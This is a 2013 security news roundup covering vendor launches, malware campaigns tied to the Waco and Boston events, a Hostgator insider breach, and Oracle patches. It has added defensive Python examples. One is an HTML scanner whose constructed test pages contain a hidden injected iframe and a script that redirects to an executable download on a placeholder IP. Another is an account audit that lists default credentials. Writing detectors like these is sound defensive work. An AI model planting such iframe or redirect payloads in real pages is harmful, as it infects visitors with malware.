Computer Security Updates Week 3 of Apr 2013

Refer to Computer Security Updates Week 2 of Apr 2013, in which the biggest news was Microsoft issuing 9 fixes covering a total of 14 vulnerabilities.

For this week, here is the biggest news.
  • Barracuda drives into DC market with 'Unified Platform'.
  • McAfee delivers enterprise class security to the cloud.
  • Cyber-Ark report connects privileged account exploitation to advanced cyber attacks.
  • Android Devices Now Better Protected with Sophos Mobile Security App.
  • Symantec publishes 2013 Q1 Zero-Day vulnerabilities.
  • Sophos reported that hackers are exploiting Waco explosion news to spread malware.
  • Sophos reported that Ex-employee hacked into Hostgator after being sacked.
  • Reuters reported that U.S. Air Force cadets win cyber war game with NSA hackers.
  • Kaspersky analyzes Boston aftermath.
  • F-Secure’s Hackathon 2013: young developer Tan Kok Boon won ‘The Most Innovative Application’.
  • Reuters reported that LulzSec hacker receives year in prison for Sony breach.
  • Reuters reported that House (US) passes cybersecurity bill as privacy concerns linger.
  • CA World 2013: The key to mobile security is identity.
  • Oracle to release 128 security patches, hundreds of products affected.
  • Bit9 - Marc Bleicher talks about the influence of OSINT as The Foundation for Social-engineering and Phishing Attacks.

KUALA LUMPUR, Malaysia, 26 April 2013 – Barracuda Drives Into DC market with 'Unified Platform'

Barracuda Networks Inc., a leading provider of security, networking and data protection solutions, today announced the launch of its new Application Delivery Controller (ADC) for Data Centres. The launch marks Barracuda’s first entry into the ADC space.

ADC is an integrated solution that combines load balancing, application acceleration, application control, and web application security into a single, high-performance platform.

Thiban Darmalingam, Regional Manager for Barracuda in Malaysia.

“Over the years our customers had been voicing their wish for an integrated platform that both secures their applications and optimises performance. Until now, customers who wanted to do that were faced with very high costs and unnecessary complexity,” said Thiban Darmalingam, the Regional Manager for Barracuda in Malaysia.

Get more details.

SANTA CLARA, Calif. / SG — April 26, 2013 – McAfee Delivers Enterprise Class Security to the Cloud

Just this week, a simple hack that gained access to the Associated Press’ Twitter account wiped out $136 billion in market value, after an erroneous post triggered a stock-market decline.

Against this backdrop, McAfee today announced that it is venturing into a new business area with the addition of identity and access management solutions to its Security Connected portfolio. These new solutions include McAfee Cloud Single Sign On and McAfee One Time Password.

Additionally, McAfee also introduced a new McAfee Identity Center of Expertise, staffed with experts in identity and cloud security to assist users with questions pertaining to identity and access management issues, such as architecture requirements and best practices.

This global announcement is particularly significant because:
  1. As more organisations commission cloud-based applications, from Dropbox to Microsoft 365, providing secure access to those services gets more complex, but it should not slow down deployment or reduce actual usage. At the same time, most apps still rely on a basic identification procedure with a simple user name and password. That is like building the best-secured fortress but handing a simple key to your back door to hundreds of people, where a single lost key would give access.
  2. The move signifies McAfee's ambition to extend its market leadership position. This solution adds to McAfee's portfolio to fuel further growth globally and in Asia Pacific. McAfee is not trying to ‘boil the ocean’; instead it is focusing on several identity-related ‘hot spots’ and investing to help its customers solve critical challenges (in a way that traditional solutions cannot) while maintaining business continuity and agility.
  3. This solution aims to overcome the challenge of providing simple and convenient access to business-relevant applications while building secure and efficient security into more complex IT environments, especially those accelerated by the use of mobile devices (bring your own device, BYOD).

Get more details.

Singapore. April 26, 2013 – New Report Connects Privileged Account Exploitation to Advanced Cyber Attacks

Organisations can significantly reduce the threat of targeted attacks by proactively securing privileged accounts, according to the first APT Privileged Account Exploitation research report. Compiled by CyberSheath’s advanced security investigations team and commissioned by Cyber-Ark, the report reveals that the theft, misuse and exploitation of privileged accounts is a key tactic in each phase of an Advanced Persistent Threat (APT) attack cycle.

Examples of privileged accounts are the default login accounts on servers, routers and similar devices; most of the time these logins still carry their factory-default credentials.

Best Practices for Preventing APT Privileged Account Compromise
  • Isolate, monitor and control every access point to all critical business systems
  • Change default passwords on all servers, databases, applications and network devices
  • Remove hard-coded passwords from scripts, configuration files and applications
  • Employ technical means of automatically enforcing enterprise password policies
  • Control access by enforcing least privilege
  • Use multifactor authentication for access to privileged accounts
  • Increase password complexity
  • Use a unique password for each local administrator account
  • Remove local administrator rights from the majority of users
  • Reduce the number of privileged domain-wide service accounts
  • Automatically change passwords on a periodic basis and immediately upon suspicion of misuse
  • Monitor and record all activities associated with administrative and privileged accounts
  • Implement tamper-proof logging, auditing, and alerting on privileged access
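Three of the practices above (change default passwords, use a unique password per local administrator account, rotate passwords periodically) can be checked mechanically against an inventory of privileged accounts. The script below is an added example, not part of the report or any Cyber-Ark product; the inventory, the default-credential list and the 90-day rotation window are constructed for illustration, and a real audit would read the inventory from a vault or directory export.

```python
"""Audit a privileged-account inventory for factory-default credentials,
one local administrator password reused across hosts, and passwords that
have not been rotated within the policy window.  All data is constructed."""
import hashlib
from datetime import date

def _h(password: str) -> str:
    """SHA-256 of a password, used only so the constructed sample is self-contained."""
    return hashlib.sha256(password.encode()).hexdigest()

# Constructed inventory: (host, account, password_hash, last_changed).
INVENTORY = [
    ("web01",    "Administrator", _h("Winter2012!"),      date(2012, 11, 2)),
    ("web02",    "Administrator", _h("Winter2012!"),      date(2012, 11, 2)),
    ("db01",     "sys",           _h("S0me-Uniq-Str1ng"), date(2013, 3, 30)),
    ("rtr-edge", "admin",         _h("admin"),            date(2011, 6, 15)),
    ("app01",    "Administrator", _h("Q!x9#v2Lp7$w"),     date(2013, 4, 1)),
]

# Constructed factory-default logins; vendor documentation is the real source.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("root", "root"), ("admin", "password")}
DEFAULT_HASHES = {(user, _h(pw)) for user, pw in DEFAULT_CREDENTIALS}

ROTATION_DAYS = 90          # assumed policy window
AUDIT_DATE = date(2013, 4, 26)

def audit(inventory, today, rotation_days=ROTATION_DAYS):
    """Return a list of (finding_kind, where, account) tuples."""
    findings = []

    # 1. Accounts still using a known factory-default credential.
    for host, account, pw_hash, _ in inventory:
        if (account, pw_hash) in DEFAULT_HASHES:
            findings.append(("default_credential", host, account))

    # 2. The same local administrator password on more than one host.
    hosts_by_credential = {}
    for host, account, pw_hash, _ in inventory:
        hosts_by_credential.setdefault((account, pw_hash), []).append(host)
    for (account, _), hosts in hosts_by_credential.items():
        if len(hosts) > 1:
            findings.append(("shared_password", tuple(sorted(hosts)), account))

    # 3. Passwords older than the rotation window.
    for host, account, _, changed in inventory:
        if (today - changed).days > rotation_days:
            findings.append(("stale_password", host, account))

    return findings

def run_audit():
    """Audit the constructed inventory as of AUDIT_DATE."""
    return audit(INVENTORY, AUDIT_DATE)

if __name__ == "__main__":
    for kind, where, account in run_audit():
        print(f"{kind:20} {where!s:24} {account}")
```

Comparing hashes rather than passwords means the audit can run against a vault export without ever handling cleartext; the default-credential list is hashed the same way once at start-up.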

Get more details.

KL, April 24, 2013 - Android Devices Now Better Protected from Malware and Spam with Latest Free Version of Sophos Mobile Security App

To help combat this growing threat, Sophos has introduced the latest version of its free Android security app, Sophos Mobile Security. Sophos Mobile Security now includes spam filter capabilities for text messages and calls. The filter rules can block specific phone numbers and calls with a hidden caller ID, as well as text messages containing potentially malicious URLs. Every incoming call or text message is scanned by the app’s Spam Protection feature and the active filter rules are applied successively. Blocked calls and text messages are logged in the Quarantine folder, where they can be restored as needed.

Sophos Mobile Security is offered for free in its stand-alone version at Google Play. Additionally, Sophos Mobile Security integrates into the company’s flagship mobile device management and security solution, Sophos Mobile Control, providing full administrator management and compliance enforcement.
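The filter behaviour described above (rules for blocked numbers, hidden caller ID and suspicious URLs, applied in order, with blocked items kept in a quarantine that can restore them) is easy to model. The code below is an added example and is not Sophos code; the rule set, the blocked numbers and the blocked-domain list are constructed, and the "malicious URL" rule uses a simple domain blocklist plus raw-IP-literal check in place of whatever reputation data the real app consults.

```python
"""Successive spam-filter rules for incoming calls and SMS, with a quarantine
that keeps blocked items so they can be restored.  Lists are constructed."""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

@dataclass
class Incoming:
    kind: str                  # "call" or "sms"
    sender: Optional[str]      # None means the caller ID was hidden
    text: str = ""

BLOCKED_NUMBERS = {"+60123456789"}                  # constructed
BLOCKED_DOMAINS = {"bad.example", "phish.example"}  # constructed; a real list comes from a feed
URL_RE = re.compile(r"\bhttps?://[^\s<>\"']+", re.IGNORECASE)
IPV4_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")

def rule_blocked_number(item):
    return "blocked number" if item.sender in BLOCKED_NUMBERS else None

def rule_hidden_caller_id(item):
    return "hidden caller ID" if item.kind == "call" and item.sender is None else None

def rule_malicious_url(item):
    if item.kind != "sms":
        return None
    for url in URL_RE.findall(item.text):
        host = (urlsplit(url).hostname or "").lower()
        listed = any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)
        # Links to a bare IP address are treated as suspicious as well.
        if listed or IPV4_RE.fullmatch(host):
            return "suspicious URL " + url
    return None

RULES = [rule_blocked_number, rule_hidden_caller_id, rule_malicious_url]

class SpamProtection:
    def __init__(self, rules=RULES):
        self.rules = list(rules)
        self.quarantine = []   # (item, reason), in the order they were blocked

    def inspect(self, item: Incoming) -> bool:
        """Apply the rules in order; the first match blocks and quarantines the item.
        Returns True when the call or message is allowed through."""
        for rule in self.rules:
            reason = rule(item)
            if reason:
                self.quarantine.append((item, reason))
                return False
        return True

    def restore(self, index: int) -> Incoming:
        """Release a quarantined item back to the user."""
        item, _ = self.quarantine.pop(index)
        return item

if __name__ == "__main__":
    sp = SpamProtection()
    for msg in (Incoming("call", None),
                Incoming("sms", "+60122222222", "Parcel held: http://track.bad.example/x")):
        print("allowed" if sp.inspect(msg) else "blocked", msg)
    print("quarantined:", [(i.kind, r) for i, r in sp.quarantine])
```

Because the rules run in a fixed order and the first hit wins, a message from a blocked number is recorded with that reason even if it also carries a suspicious link; keep the cheapest rules first and the reason in the quarantine entry so the user can see why something was held.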

Get more details.

Symantec, Apr 23, 2013 - 2013 Q1 Zero-Day Vulnerabilities

Symantec observed 11 zero-day vulnerabilities exploited in the first three months of 2013 affecting Oracle Java, Adobe Flash, Adobe Reader, and Microsoft Internet Explorer, which is quite high.

Trends observed:
  • An increase in the exploitation of zero-days.
  • Exploitation of sandbox protections directly from visiting websites that host exploits, delivered through the web browser.

Oracle has recently published 128 security patches for hundreds of products. There is no information matching the patches to CVEs, so end users simply have to apply the latest updates as soon as possible.

Get more details.

Kuala Lumpur, Malaysia, April 22, 2013 – Warning! Hackers are exploiting Waco explosion news to spread malware

Once again, cybercriminals are leaping at the opportunity to take advantage of breaking news stories to spread malware. The latest example, coming just days after malware authors exploited interest in the Boston Marathon bombings, concerns the fatal explosion in Waco, Texas, of a fertiliser plant.

Malicious emails intercepted by SophosLabs carry the subject line "CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas" and lead to the Redkit exploit kit, which takes advantage of vulnerabilities on visiting PCs in order to infect them with malware.

The Redkit exploit kit uses a PHP shell hosted on compromised websites to run its operations. First, Redkit bounces first-level redirects to the next compromised server; then malicious content delivering PDF or JAR (Java Archive) exploits is served from a command-and-control server.

Sophos protects against the attack, detecting the injected malicious iFrames as Troj/ExpJS-II and Troj/Iframe-JG.

Sophos, Apr 21, 2013 - Hosting company Hostgator hacked, suspect arrested after being "rooted with his own rootkit"

Sophos reported that an ex-employee of Hostgator was arrested for hacking into his former employer's network.

Court documents allege that after Eric Gunnar Grisse, 29, got the sack from his job at Hostgator, he jumped right back into the company's network, using a backdoor Trojan he had planted earlier.

Get more details.

Reuters, HANOVER, Maryland, Fri Apr 19, 2013 - U.S. Air Force cadets win cyber war game with NSA hackers

Reuters reported that a U.S. Air Force Academy team on Friday beat rivals from other elite military colleges after a three-day simulated cyber "war" against hackers from the National Security Agency, an exercise meant to teach future officers the importance of cybersecurity.

Nearly 60 government experts, sitting under a black skull-and-crossbones flag, worked around the clock this week to break into computer networks built by students at the Air Force, Army, Navy, Coast Guard and Merchant Marine academies. Two military graduate schools also participated.

Get more details.

PETALING JAYA, April 19, 2013 – Kaspersky Analyzes Boston Aftermath

While many are still in shock after the Boston Marathon bombings on 16 April, it didn’t take long for cyber criminals to abuse that tragic incident for their dirty deeds.

Emails related to Boston Aftermath

Emails containing links to malicious locations with names like “news.html” were intercepted. These pages contain URLs of non-malicious YouTube clips covering the recent event. After a delay of 60 seconds, another link, leading to an executable file, is activated.

Kaspersky Lab detects this threat as “Trojan-PSW.Win32.Tepfer”.
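Both the Waco campaign (injected hidden iframes on compromised sites, per the Sophos item above) and the Boston lure page (a benign-looking page that switches to an executable after a 60-second delay) leave patterns that can be picked out of a saved HTML page statically. The scanner below is an added example written for this post and is not Sophos or Kaspersky code; the two sample pages, the 203.0.113.x hosts and the file extensions treated as "executable" are constructed, and the heuristics (iframes sized 1x1 or hidden by style; `meta refresh` or `setTimeout` redirects whose target ends in an executable extension) are a triage aid, not a substitute for detection signatures.

```python
"""Static triage of saved HTML for two patterns: hidden iframes of the kind
injected into compromised sites, and a delayed redirect that swaps a benign
page for an executable download.  Sample pages are constructed."""
import re
from html.parser import HTMLParser

EXEC_EXT = (".exe", ".scr", ".jar", ".pdf")   # assumed set, from the payload types named above
SET_TIMEOUT_RE = re.compile(r"setTimeout\s*\((.*?),\s*(\d+)\s*\)", re.DOTALL)
QUOTED_RE = re.compile(r"""['"]([^'"]+)['"]""")
REFRESH_RE = re.compile(r"\s*(\d+)\s*;\s*url\s*=\s*(\S+)", re.IGNORECASE)

def _is_hidden(attrs: dict) -> bool:
    """1x1 (or smaller) frames, or frames hidden / pushed off-screen by inline style."""
    style = attrs.get("style", "").replace(" ", "").lower()
    def tiny(value):
        m = re.match(r"\d+", value)
        return m is not None and int(m.group()) <= 1
    return (tiny(attrs.get("width", "")) or tiny(attrs.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style
            or "left:-" in style or "top:-" in style)

class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}          # HTMLParser lower-cases attribute names
        if tag == "iframe" and _is_hidden(a):
            self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_RE.match(a.get("content", ""))
            if m and m.group(2).lower().endswith(EXEC_EXT):
                self.findings.append(("delayed_redirect", m.group(2), int(m.group(1))))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; look for timed navigation to an executable.
        if not self._in_script:
            return
        for body, millis in SET_TIMEOUT_RE.findall(data):
            for target in QUOTED_RE.findall(body):
                if target.lower().endswith(EXEC_EXT):
                    self.findings.append(("delayed_redirect", target, int(millis) // 1000))

def scan(html: str):
    """Return a list of findings for one page: ('hidden_iframe', src) or
    ('delayed_redirect', target, delay_seconds)."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed: a legitimate page with an injected 1x1 hidden iframe.
COMPROMISED_SITE = """<html><body><h1>Local news</h1><p>Story text.</p>
<iframe src="http://203.0.113.7/go.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>"""

# Constructed: a lure page showing a real video embed, then redirecting after 60 s.
LURE_PAGE = """<html><head><title>news.html</title></head><body>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<script>setTimeout(function(){ location.href = "http://203.0.113.9/boston.exe"; }, 60000);</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("compromised site", COMPROMISED_SITE), ("lure page", LURE_PAGE)):
        print(name, "->", scan(page))
```

The visible YouTube embed on the lure page is deliberately not flagged: off-site iframes are normal on the web, and it is the combination of size, hiding and timed navigation to an executable that marks these two campaigns.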

Kuala Lumpur, Apr 18, 2013 - F-Secure’s Hackathon 2013: Young developer Tan Kok Boon won ‘The Most Innovative Application’

F-Secure Malaysia’s Hackathon 2013, which was conducted on Apr 12, 2013, attracted more than 30 talented Malaysian developers to compete in a 30-hour challenge while networking with other developers. The event gave them the opportunity to learn about F-Secure’s APIs and security systems and to develop innovative applications for better online security.

Prizes were awarded to three applications. Lee Swee Meng won the award for ‘The Most Unexpected Demo Effect’ with his 3D Globe application, followed by the duo Fatin Ruzanna and Francis Fueconcillo, who walked away with the award for ‘The Best Use of F-Secure’s APIs (Application Programming Interface)’. The duo amazed the crowd with their application, which integrated F-Secure’s APIs with Twitter, allowing users to avoid malicious tweets on the social networking platform.

F-Secure Hackathon 2013's participants

Finally, young developer Tan Kok Boon stole the spotlight with his groundbreaking application, which allows users to monitor and prevent threats using F-Secure’s World Map Interface. Tan won the award for ‘The Most Innovative Application’ and the award for ‘The Best Overall Performance’, which entitles him to a luxurious dinner with Mikko Hyppönen, internationally acclaimed computer security expert, columnist, malware researcher and Chief Research Officer (CRO) of F-Secure Corporation.

Get more details.

Reuters, Apr 18, 2013 - LulzSec hacker receives year in prison for Sony breach

Reuters reported that a hacker who pleaded guilty last year to taking part in an extensive computer breach of Sony Pictures Entertainment was sentenced on Thursday in Los Angeles to a year in prison, followed by home detention, federal prosecutors said.

Kretsinger, 25, was also ordered by a U.S. district judge in Los Angeles to perform 1,000 hours of community service after his release from prison, said Thom Mrozek, spokesman for the U.S. Attorney's Office in Los Angeles.

Get more details.

Reuters, Apr 18, 2013 - House (US) passes cybersecurity bill as privacy concerns linger

The House of Representatives passed legislation on Thursday designed to help companies and the government share information on cyber threats, though concerns linger about how much protection the bill offers for private information. President Obama had threatened to veto it.

The bill proposes broader sharing of cyber-threat data between the private and public sectors.

Some lawmakers and privacy activists worry that the legislation would allow the government to monitor citizens' private information and companies to misuse it.

Get more details.

CA Blogs, Apr 18, 2013 - CA World 2013: The key to mobile security is identity

Jeff Broberg stressed that mobile security starts and ends with identity.

Get more details.

ZDNet, Apr 16, 2013 - Oracle to release 128 security patches, hundreds of products affected

ZDNet reported that Oracle is about to release 128 fixes for security vulnerabilities that affect "hundreds" of its products.

The 128 security patches cover the following product areas: Database, Supply Chain, Fusion Middleware, E-Business Suite, PeopleSoft, Siebel, Retail, Health Sciences, Oracle Flexcube, Primavera, Oracle & Sun System Product Suite, MySQL Product Suite and Oracle Support Tools.

Critical Patch Updates are released on the Tuesday closest to the 17th day of January, April, July and October. The next four dates are:
  • 16 July 2013
  • 15 October 2013
  • 14 January 2014
  • 15 April 2014
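The schedule rule above is simple enough to compute, which is handy for patch-window planning. The helper below is an added example and not Oracle's code; it implements the published rule ("the Tuesday closest to the 17th of January, April, July and October") and reproduces the four dates listed. Because the previous and following Tuesday are always a different number of days from the 17th (their distances sum to 7), the rule never ties, so the 17th falling on a Saturday yields the following Tuesday.

```python
"""Compute Oracle Critical Patch Update dates from the published rule:
the Tuesday closest to the 17th of January, April, July and October."""
from datetime import date, timedelta

CPU_MONTHS = (1, 4, 7, 10)
TUESDAY = 1                     # date.weekday(): Monday == 0

def cpu_date(year: int, month: int) -> date:
    """The CPU date for one of the four release months."""
    if month not in CPU_MONTHS:
        raise ValueError("no Critical Patch Update in month %d" % month)
    anchor = date(year, month, 17)
    back = (anchor.weekday() - TUESDAY) % 7    # days back to the previous Tuesday
    fwd = (TUESDAY - anchor.weekday()) % 7     # days forward to the next Tuesday
    # back + fwd == 7 unless the 17th is itself a Tuesday (both 0), so no tie is possible.
    if back <= fwd:
        return anchor - timedelta(days=back)
    return anchor + timedelta(days=fwd)

def next_cpu_dates(after: date, count: int = 4) -> list:
    """The `count` CPU dates strictly after `after`, in chronological order."""
    found = []
    year = after.year
    while len(found) < count:
        for month in CPU_MONTHS:
            candidate = cpu_date(year, month)
            if candidate > after and len(found) < count:
                found.append(candidate)
        year += 1
    return found

def upcoming(after_iso: str, count: int = 4) -> list:
    """Same as next_cpu_dates, taking and returning ISO-8601 strings."""
    return [d.isoformat() for d in next_cpu_dates(date.fromisoformat(after_iso), count)]

def days_until_next_cpu(today: date) -> int:
    """Planning helper: how many days remain before the next CPU."""
    return (next_cpu_dates(today, 1)[0] - today).days

if __name__ == "__main__":
    # As of the day the April 2013 CPU shipped, the next four dates are the ones in the post.
    for d in upcoming("2013-04-16"):
        print(d)
```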

Get more details.

Bit9 Blog, Apr 15, 2013 - Marc Bleicher talks about the influence of OSINT as The Foundation for Social-engineering and Phishing Attacks

In a nutshell, Open-source intelligence refers to finding and analyzing information from any source that is publicly available.

Marc explained that government agencies have been using OSINT to gather information for conducting reconnaissance since the Internet age.

Two tools are useful in performing OSINT: 1) Maltego, which can gather information about relationships between people, organisations, websites, Internet infrastructure, phrases, affiliations, documents and files; 2) FOCA 3.2, a free fingerprinting and information-gathering tool that can search for servers, domains, URLs and public documents and output everything as a network tree.

Since OSINT is the first step attackers take before carrying out malicious activities, it should be regarded as another layer in your overall security stack.

